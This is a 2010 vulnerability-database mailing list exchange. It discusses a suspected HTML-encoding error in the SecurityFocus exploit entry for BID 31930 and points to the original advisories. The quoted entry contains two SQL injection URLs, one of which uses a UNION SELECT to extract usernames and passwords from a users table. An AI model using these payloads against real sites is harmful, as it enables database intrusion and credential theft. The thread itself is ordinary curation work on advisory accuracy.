[VIM] BID 31930 exploit

George A. Theall theall at tenable.com
Thu Nov 18 19:46:31 CST 2010


On Nov 18, 2010, at 5:10 AM, security curmudgeon wrote:

>
> http://www.securityfocus.com/bid/31930/exploit
>
> http://www.example.com/[path]/index.php?mod=2&nid=-268)%20UNION 
> %20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass), 
> 0,0,0,0,0,0,0,0,0%20FROM%20default_users
>
> http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION  
> ALL SELECT 0,0,0,0,0,version()--
>
> --
>
> Just want to confirm, it appears the "&" is actually some HTML  
> decoding snafu that is essentially doing & and an encoded &? seems  
> like that should be "&nid=" in the first example and "&cpage" in the  
> second?

Seems to be in error in the BID -- look at the advisory on Packet  
Storm and SecurityReason:

   http://packetstormsecurity.org/files/view/71280/tandiscms-sql.txt
   http://securityreason.com/exploitalert/5013


George
-- 
theall at tenablesecurity.com





More information about the VIM mailing list